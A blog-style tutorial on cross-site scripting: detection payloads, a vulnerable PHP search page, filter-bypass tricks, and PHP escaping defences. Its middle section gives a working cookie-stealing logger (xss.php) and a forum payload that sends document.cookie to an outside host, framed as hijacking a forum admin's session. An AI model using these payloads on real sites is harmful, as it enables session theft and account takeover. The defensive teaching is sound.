The XSS flaw: what is it and how do you protect against it?


Last updated: July 16, 2022

In this post, I will tell you about the cross-site scripting flaw, abbreviated XSS. We will see together how to exploit this flaw and, of course, how to protect yourself from it.

Before starting, I must clarify one thing: many people think this flaw is useless. That is wrong. Believe me, the XSS flaw is dangerous: of course you will not take control of a server with it, but it makes other kinds of attacks much easier. You just have to know how to use it.

What is the XSS vulnerability?

The XSS flaw, originally abbreviated CSS (Cross Site Scripting) and renamed XSS to avoid confusion with CSS (Cascading Style Sheets), is a type of website security vulnerability found in poorly secured web applications.

The principle of this flaw is to inject malicious JavaScript code into a vulnerable website, for example by posting a message on a forum that redirects visitors to a fake site (phishing) or steals their information (cookies).

The XSS flaw lets you run scripts on the client side. This means you can only run JavaScript, HTML and other languages that execute in the browser of the person viewing the page, not on the server itself. I will let your imagination give you ideas.

How to detect the presence of an XSS vulnerability?

XSS vulnerabilities are widespread on the web, more specifically in forums, web applications and search engines.
The presence of an XSS flaw can be detected, for example, by entering a small JavaScript script in a form field or in a URL parameter:

<script>alert('Hack')</script>

If a dialog box appears, the web application echoes our input into the page unmodified, and we can conclude that it is vulnerable to XSS attacks.

To fully understand the principle, nothing beats an example.
Assume the following code:


<?php
if (isset($_GET['searchword'])) {
    // Vulnerable: the parameter is echoed into the page without any encoding
    echo "You are looking for the following word: " . $_GET['searchword'];
}
?>
<form method="get">Search: <input type="text" name="searchword"> <input type="submit" value="OK"></form>



On a web browser this would give:

No variable was transmitted in GET, so the page only displays "Search:".
If I now type "FunInformatique" and validate, it gives me "You are looking for the following word: FunInformatique".
So far everything is normal. But what happens if I type <script>alert('Hack')</script> in the search bar? The parameter is written into the page as-is, the browser sees a real <script> tag, and the JavaScript code is executed. We can therefore conclude that this application contains an XSS flaw.

How to bypass XSS filters?

In reality, it doesn't always work that way. Web developers are aware of this attack, so they have developed methods to secure their web applications against this vulnerability. I can, for example, cite magic_quotes_gpc. (Note that magic_quotes_gpc was a PHP configuration setting, deprecated in PHP 5.3 and removed in PHP 5.4, so you will only meet it on old installations; the bypass techniques below still apply to home-made filters that behave the same way.)

In this part, I'll show you how to bypass some filters used by developers to secure web applications:

The magic_quotes_gpc filter

When magic_quotes_gpc is enabled, every ' (apostrophe), " (double quote), \ (backslash) and NULL character in incoming data is prefixed with a backslash, as the addslashes() function does. It applies to data sent via the GET, POST and COOKIE methods (hence "gpc").
For example, if I enter the following code in the search bar and click send:

<script>alert("Hack")</script>

it becomes:

<script>alert(\"Hack\")</script>

which is no longer valid JavaScript, so nothing runs. So how do we bypass this filter? Just use the JavaScript function String.fromCharCode().

This function takes a list of character codes (here the decimal code of each letter) and returns the corresponding string, so the payload contains no quotes at all and there is nothing for magic_quotes_gpc to escape.
For this I will use Hackbar, a Firefox plugin, to encode the text.

Using "hack" (without the quotes) looks like this:

<script>alert(String.fromCharCode(104, 97, 99, 107))</script>

Miracle, it works!

Obfuscation technique

Another kind of filter blacklists keywords. This one, for example, blocks the following:

  • <script> (and </script>)
  • alert

Here, if we put <script>alert('Hack')</script>, the site will display ('Hack') as the message, because it removes every <script> tag and every occurrence of alert.

To bypass this filter, we simply write script as scr<script>ipt and alert as alealertrt. The filter deletes the inner copy of the banned word, and the two halves left behind reassemble into the original word, like this:

<scr<script>ipt>alealertrt('Hack')</scr</script>ipt>

Once the banned strings are removed, the filter's output is:

<script>alert('Hack')</script>

And it still works! This trick only fails if the filter loops until nothing more is removed, which naive filters rarely do.
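To see both bypasses work end to end, here is an added example (not code from the original post) that emulates the two naive filters described above in JavaScript and checks which payloads survive them. The filter behaviour and the stillExecutes() oracle are simplified assumptions, not PHP or a browser.

```javascript
// Added example, not code from the original post: emulates the two naive
// server-side filters discussed above and checks which payloads survive them.
// Filter behaviour and the oracle below are simplified assumptions, not PHP itself.

// Emulates PHP's magic_quotes_gpc: prefixes ' " \ and NUL with a backslash.
function magicQuotes(input) {
  return input.replace(/(['"\\\0])/g, "\\$1");
}

// Emulates a blacklist that deletes <script>, </script> and the word "alert"
// in a single pass, without re-scanning its own output.
function stripKeywordsOnce(input) {
  return input.replace(/<\/?script>/gi, "").replace(/alert/gi, "");
}

// Toy oracle (not a browser): true if the HTML still holds <script>alert(...)</script>
// whose argument is valid JavaScript (a backslash-free quoted string,
// a String.fromCharCode(...) call, or nothing at all).
function stillExecutes(html) {
  const arg = String.raw`(?:"[^"\\]*"|'[^'\\]*'|String\.fromCharCode\([\d,\s]*\)|)`;
  return new RegExp(`<script>\\s*alert\\(${arg}\\)\\s*</script>`, "i").test(html);
}

// The quote-free form of a message: each character as its decimal code point.
function toCharCodePayload(text) {
  const codes = Array.from(text, c => c.charCodeAt(0)).join(", ");
  return `<script>alert(String.fromCharCode(${codes}))</script>`;
}

// Splits the blacklisted words so that one pass of the filter reassembles them:
// <scr<script>ipt> -> <script>, alealertrt -> alert, </scr</script>ipt> -> </script>.
function toNestedPayload(jsArgument) {
  return `<scr<script>ipt>alealertrt(${jsArgument})</scr</script>ipt>`;
}

// Runs a payload through a chain of filters and reports whether it survives.
function survives(payload, filters) {
  return stillExecutes(filters.reduce((html, f) => f(html), payload));
}

// Constructed demo payloads
const naive = '<script>alert("Hack")</script>';
const charCode = toCharCodePayload("hack"); // ...String.fromCharCode(104, 97, 99, 107)...
const nested = toNestedPayload("String.fromCharCode(104, 97, 99, 107)");

console.log(survives(naive, [magicQuotes]));                     // false: the quotes get escaped
console.log(survives(charCode, [magicQuotes]));                  // true: nothing to escape
console.log(survives(naive, [stripKeywordsOnce]));               // false: tag and word removed
console.log(survives(nested, [stripKeywordsOnce]));              // true: the words reassemble
console.log(survives(nested, [magicQuotes, stripKeywordsOnce])); // true: beats both at once
```

The last line is the point of combining the two tricks: a nested payload whose argument is built with String.fromCharCode() contains neither a quote nor an intact banned word, so it survives both filters applied one after the other.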

There is also a Firefox plugin, XSS Me, specialising in finding this type of vulnerability.

How to exploit an XSS vulnerability?

OK, so, as we have just seen, XSS flaws run on the client side. So to trap a target, we have to get the site administrator to run our script himself, and then retrieve his cookie.

To exploit the XSS flaw, we therefore need a PHP script that reads the cookie value from a GET parameter and writes it to a .txt file.

For that, create a file under the name xss.php and put the following code:

<?php
$cookie = isset($_GET['a']) ? $_GET['a'] : ''; // the stolen cookie arrives in the "a" GET parameter
if ($cookie)
{
    $fp = fopen('cookies.txt', 'a'); // open cookies.txt in append mode
    fputs($fp, $cookie . "\n");      // write the cookie on its own line
    fclose($fp);                     // close the cookies.txt file
}
?>
<script>
location.replace('http://www.google.fr');
// Redirect the target to google.fr so that they don't suspect anything
</script>

Save the xss.php file, then upload it to a web host that runs PHP (by FTP, for example). Our script is now in place; it only remains to test it.

Imagine that, by testing the techniques above on a forum where you are a member, you detect an XSS vulnerability and want to use the PHP script we have just created.

How to do it?

You simply post a message on the forum containing the following text:

<script>window.open('http://votresite.com/xss.php?a='+document.cookie)</script>

(screenshot: XSS on Google Forum)

Looking at the code, the ?a= part is what fills the $_GET['a'] variable of our PHP script.

document.cookie is the victim's cookie, as seen by the browser (cookies set with the HttpOnly flag are not included in it).

You have just retrieved the forum admin's cookie, but what do you do with it?

At this point, many people think that XSS vulnerabilities are not dangerous, but they are largely mistaken.

Once you have retrieved the cookie, you can add it to your own browser's cookies for the forum's domain. Then reload the forum and you will be in the admin's session without needing a password, as long as that session is still valid.

Protect yourself from the XSS vulnerability

Several techniques allow you to protect yourself from the XSS flaw. They all come down to encoding or removing user-supplied data before it is written into the page:

  • The htmlspecialchars() function converts the special characters &, <, >, " (and ' with the ENT_QUOTES flag, the default since PHP 8.1) to HTML entities, so the browser displays them as text instead of interpreting them.
  • htmlentities() is identical to htmlspecialchars() except that it converts every character that has an HTML entity equivalent.
  • strip_tags() removes all HTML tags. Be careful: it does nothing against data injected inside an attribute, so it is not a substitute for encoding.
  • In addition, set the session cookie with the HttpOnly flag so that document.cookie cannot read it; the cookie theft shown above then no longer yields the session.
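To make the difference between these functions concrete, here is an added example (not code from the original post) with JavaScript re-implementations of the PHP output filters listed above, applied to the search page from the start of the post in two contexts: the page body, where the post's payload lands, and a single-quoted input attribute, where the same word is typically echoed back. The page templates and the looksInjected() check are assumptions made for this example.

```javascript
// Added example, not code from the original post: JavaScript re-implementations
// of the PHP output filters listed above, applied to the search page from the
// start of the post, to show what each one does and does not stop. The page
// templates and the looksInjected() check are assumptions made for this example.

// htmlspecialchars() as it behaved by default before PHP 8.1 (ENT_COMPAT):
// & < > " become entities, the single quote is left alone. PHP 8.1 made
// ENT_QUOTES the default, which also encodes '.
function htmlspecialchars(s, entQuotes = false) {
  let out = s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;");
  if (entQuotes) out = out.replace(/'/g, "&#039;");
  return out;
}

// Rough equivalent of strip_tags(): deletes anything that looks like a tag.
function stripTags(s) {
  return s.replace(/<[^>]*>/g, "");
}

// The post's search page: the word is echoed into the page body.
function renderSearchPage(word, encoder) {
  return `<p>You are looking for the following word: ${encoder(word)}</p>`;
}

// A second context most search pages also have: the word put back into the
// input box, here inside a single-quoted attribute.
function renderSearchBox(word, encoder) {
  return `<input type="text" name="searchword" value='${encoder(word)}'>`;
}

// Toy check (not a browser): blank out quoted attribute values, then look for
// a live <script> tag or an on* event-handler attribute outside any value.
function looksInjected(html) {
  const noStrings = html.replace(/'[^']*'|"[^"]*"/g, "''");
  return /<script\b/i.test(noStrings) || /\son\w+\s*=/i.test(noStrings);
}

const identity = s => s;
const bodyPayload = "<script>alert('Hack')</script>";
const attrPayload = "' onmouseover='alert(1)";

// Body context: both functions neutralise the tag.
console.log(looksInjected(renderSearchPage(bodyPayload, identity)));         // true: no filter
console.log(looksInjected(renderSearchPage(bodyPayload, stripTags)));        // false
console.log(looksInjected(renderSearchPage(bodyPayload, htmlspecialchars))); // false

// Attribute context: there is no tag for strip_tags() to remove, and the old
// htmlspecialchars() default leaves the quote that closes the value.
console.log(looksInjected(renderSearchBox(attrPayload, stripTags)));                      // true
console.log(looksInjected(renderSearchBox(attrPayload, s => htmlspecialchars(s))));       // true
console.log(looksInjected(renderSearchBox(attrPayload, s => htmlspecialchars(s, true)))); // false
```

The lesson is that the right function depends on where the data is written: for text and attributes, htmlspecialchars() with ENT_QUOTES (or double-quoted attributes) is what closes the hole, while strip_tags() alone leaves attribute injection wide open.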

I hope you were able to learn something from this article and understand the danger of the XSS flaw!
If so, think about sharing this post on Facebook or Twitter; that would make me really happy! 😉